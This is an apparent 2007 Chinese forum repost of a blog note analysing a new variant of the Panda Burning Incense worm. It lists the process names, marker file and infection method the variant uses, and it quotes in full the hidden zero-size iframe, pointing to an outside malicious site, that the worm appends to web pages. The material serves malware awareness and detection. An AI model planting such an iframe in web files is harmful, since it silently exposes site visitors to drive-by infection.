新熊猫烧香的一些小变化 07:01:30:19:47 |转自-海色の月 ]
转自--[color=Blue]海色の月[/color]的博客当某些媒体错误地引导大家说熊猫烧香不再更新的同时,熊猫烧香依旧在暗地里偷偷地更新着,新的熊猫烧香较之前的变种有了一些小小的变化,下面简单说两句。
新的熊猫烧香开始尝试结束自身之前变种的进程了,如:
spoclsv.exe
nvscv32.exe
sppoolsv.exe
spo0lsv.exe
在病毒所到之处留下的标记文件也不是Desktop_.ini,取而代之的是Desktop__.ini。
感染文件的方式依旧是捆绑,但不是简单的直接将自身添加到被感染文件之前,所以被感染文件的图标和之前不同,不是熊猫拿着三炷香在烧了。
在htm/html/asp/php/jsp/aspx等网页文件尾部添加的代码也出现了较新的地址:
<iframe src=http://www.lovebak.com/qq.htm width="0" height="0"></iframe>
指向IP仍和之前krvkr.com一致。
病毒内原来经常写“交流字符”的地方现在留着这些信息:
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
adsf
hjjjjjj
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx!
更多变化持续观察中……
[[i] 本帖最后由 fishyxq 于 2007-1-31 16:05 编辑 [/i]]
页:
[1]